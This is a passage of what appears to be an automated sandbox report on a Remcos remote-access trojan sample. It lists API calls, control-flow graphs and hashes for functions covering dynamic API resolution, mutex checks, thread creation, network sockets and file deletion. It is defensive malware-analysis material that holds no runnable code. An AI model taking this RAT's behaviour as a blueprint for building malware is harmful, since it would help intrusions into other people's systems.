                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad$HandleModule
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                        • API String ID: 4236061018-3687161714
                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                        Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 488 4432b5-4432c1 call 448cc9 491 4432e3-4432ef call 44333a ExitProcess 488->491 492 4432c3-4432d1 GetPEB 488->492 492->491 493 4432d3-4432dd GetCurrentProcess TerminateProcess 492->493 493->491
                        APIs
                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                        • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                        • ExitProcess.KERNEL32 ref: 004432EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID: PkGNG
                        • API String ID: 1703294689-263838557
                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                        Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03 call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 86 40ec08-40ec0a 80->86 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 89 40ec13-40ec1a 86->89 90 40ec0c-40ec0e 86->90 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 105 40ec33-40ec37 95->105 106 40ec2c-40ec2e 95->106 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 108 40ec76-40ec89 call 401e65 call 401fab 105->108 109 40ec39-40ec40 call 407716 105->109 106->105 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 120 40ec42-40ec47 call 407738 call 407260 109->120 121 40ec4c-40ec5f call 401e65 call 401fab 109->121 120->121 121->108 142 40ec61-40ec67 121->142 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 142->108 143 40ec69-40ec6f 142->143 143->108 146 40ec71 call 407260 143->146 146->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed39 call 401e65 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 191 40ee1e-40ee42 call 40247c call 434798 183->191 184->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 214 40ed3e-40ed7b call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 205->214 218 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 212->218 213->218 214->177 218->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 218->286 287 40efc1 236->287 288 40efdc-40efde 236->288 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                        APIs
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000104), ref: 0040E9EE
                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\jdSldfVS.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                        • API String ID: 2830904901-3961372815
                        • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                        • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                        Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                        • SetEvent.KERNEL32(?), ref: 00404E43
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                        • closesocket.WS2_32(?), ref: 00404E5A
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                        • SetEvent.KERNEL32(?), ref: 00404EA2
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                        • SetEvent.KERNEL32(?), ref: 00404EBA
                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                        • SetEvent.KERNEL32(?), ref: 00404ED1
                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                        • String ID: PkGNG
                        • API String ID: 2403171778-263838557
                        • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                        • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                        Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 465 448299-4482b0 GetLastError 466 4482b2-4482bc call 4487bc 465->466 467 4482be-4482c5 call 445af3 465->467 466->467 474 44830f-448316 SetLastError 466->474 470 4482ca-4482d0 467->470 472 4482d2 470->472 473 4482db-4482e9 call 448812 470->473 476 4482d3-4482d9 call 446782 472->476 481 4482ee-448304 call 448087 call 446782 473->481 482 4482eb-4482ec 473->482 475 448318-44831d 474->475 483 448306-44830d SetLastError 476->483 481->474 481->483 482->476 483->475
                        APIs
                        • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                        • _free.LIBCMT ref: 004482D3
                        • _free.LIBCMT ref: 004482FA
                        • SetLastError.KERNEL32(00000000), ref: 00448307
                        • SetLastError.KERNEL32(00000000), ref: 00448310
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                        Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 496 448566-44857a 497 448587-4485a2 LoadLibraryExW 496->497 498 44857c-448585 496->498 500 4485a4-4485ad GetLastError 497->500 501 4485cb-4485d1 497->501 499 4485de-4485e0 498->499 502 4485bc 500->502 503 4485af-4485ba LoadLibraryExW 500->503 504 4485d3-4485d4 FreeLibrary 501->504 505 4485da 501->505 506 4485be-4485c0 502->506 503->506 504->505 507 4485dc-4485dd 505->507 506->501 508 4485c2-4485c9 506->508 507->499 508->507
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                        • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                        Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 509 40d069-40d095 call 401fab CreateMutexA GetLastError
                        APIs
                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                        • GetLastError.KERNEL32 ref: 0040D083
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID: SG
                        • API String ID: 1925916568-3189917014
                        • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                        • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                        Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 512 4484ca-4484f4 513 4484f6-4484f8 512->513 514 44855f 512->514 515 4484fe-448504 513->515 516 4484fa-4484fc 513->516 517 448561-448565 514->517 518 448506-448508 call 448566 515->518 519 448520 515->519 516->517 522 44850d-448510 518->522 521 448522-448524 519->521 523 448526-448534 GetProcAddress 521->523 524 44854f-44855d 521->524 525 448541-448547 522->525 526 448512-448518 522->526 527 448536-44853f call 43436e 523->527 528 448549 523->528 524->514 525->521 526->518 530 44851a 526->530 527->516 528->524 530->519
                        APIs
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc__crt_fast_encode_pointer
                        • String ID:
                        • API String ID: 2279764990-0
                        • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                        • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                        • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                        • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                        Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 532 40165e-401664 533 401666-401668 532->533 534 401669-401674 532->534 535 401676 534->535 536 40167b-401685 534->536 535->536 537 401687-40168d 536->537 538 4016a8-4016a9 call 4344ea 536->538 537->538 539 40168f-401694 537->539 542 4016ae-4016af 538->542 539->535 541 401696-4016a6 call 4344ea 539->541 544 4016b1-4016b3 541->544 542->544
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                        • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                        Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 560 445af3-445afe 561 445b00-445b0a 560->561 562 445b0c-445b12 560->562 561->562 563 445b40-445b4b call 4405dd 561->563 564 445b14-445b15 562->564 565 445b2b-445b3c RtlAllocateHeap 562->565 569 445b4d-445b4f 563->569 564->565 566 445b17-445b1e call 445545 565->566 567 445b3e 565->567 566->563 573 445b20-445b29 call 442f80 566->573 567->569 573->563 573->565
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                        • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                        • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                        • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                        Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 576 446137-446143 577 446175-446180 call 4405dd 576->577 578 446145-446147 576->578 585 446182-446184 577->585 580 446160-446171 RtlAllocateHeap 578->580 581 446149-44614a 578->581 582 446173 580->582 583 44614c-446153 call 445545 580->583 581->580 582->585 583->577 588 446155-44615e call 442f80 583->588 588->577 588->580
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

                        Non-executed Functions

                        Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                        • DeleteFileA.KERNEL32(?), ref: 00408652
                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
